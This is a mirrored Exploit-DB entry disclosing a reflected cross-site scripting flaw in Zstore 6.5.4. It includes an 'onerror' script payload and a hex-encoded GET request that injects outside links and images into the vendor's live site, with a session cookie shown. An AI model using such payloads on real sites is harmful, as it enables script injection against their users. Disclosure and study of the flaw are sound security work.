bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51207.txt
Exploit-DB d4e68dbb7e DB: 2023-04-04 
39 changes to exploits/shellcodes/ghdb

ProLink PRS1841 PLDT Home fiber - Default Password

Nacos 2.0.3 - Access Control vulnerability

sudo 1.8.0 to 1.9.12p1 - Privilege Escalation

sleuthkit 4.11.1 - Command Injection

Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS)

ManageEngin AMP 4.3.0 - File-path-traversal

SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS)

AmazCart CMS 3.4 - Cross-Site-Scripting (XSS)
Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)
Art Gallery Management System Project v1.0 - SQL Injection (sqli) authenticated
Art Gallery Management System Project v1.0 - SQL Injection (sqli) Unauthenticated

ChiKoi v1.0 - SQL Injection

ERPGo SaaS 3.9 - CSV Injection

GLPI  Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)

GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin
GLPI Activity  v3.1.0 - Authenticated Local File Inclusion on Activity plugin
GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion
GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure
GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)

Metform Elementor Contact Form Builder v3.1.2 - Unauthenticated Stored Cross-Site Scripting (XSS)

MyBB 1.8.32 - Remote Code Execution (RCE) (Authenticated)

Paid Memberships Pro  v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection

pimCore v5.4.18-skeleton  - Sensitive Cookie with Improper SameSite Attribute

Prizm Content Connect v10.5.1030.8315 - XXE

SLIMSV 9.5.2 - Cross-Site Scripting (XSS)

WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE

Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS)
Roxy WI v6.1.0.0 - Improper Authentication Control
Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload

Solaris 10 libXm - Buffer overflow Local privilege escalation

Chromacam 4.0.3.0 - PsyFrameGrabberService Unquoted Service Path

Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow

HotKey Clipboard 2.1.0.6 - Privilege Escalation Unquoted Service Path

Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path

Windows 11 10.0.22000 -  Backup service Privilege Escalation

Windows/x86 - Create Administrator User / Dynamic PEB & EDT method null-free Shellcode (373 bytes)
2023-04-04 00:16:32 +00:00

58 lines
No EOL
2.3 KiB
Text
Raw Blame History

## Exploit Title: Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS)
## Development: nu11secur1ty
## Date: 01.18.2023
## Vendor: https://zippy.com.ua/
## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4
## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4
## Description:
The value of manual insertion point 1 is copied into the HTML document
as plain text between tags.
The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in
the manual insertion point 1.
This input was echoed unmodified in the application's response.
## STATUS: HIGH Vulnerability
[+] Exploit:
```GET
GET /index.php?p=App%2fPages%2fChatgiflc%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a
HTTP/2
Host: store.zippy.com.ua
Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
```
## Proof and Exploit:
[href](https://streamable.com/tplz84)
## Reference:
[href](https://portswigger.net/web-security/cross-site-scripting/reflected)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Reference in a new issue View git blame Copy permalink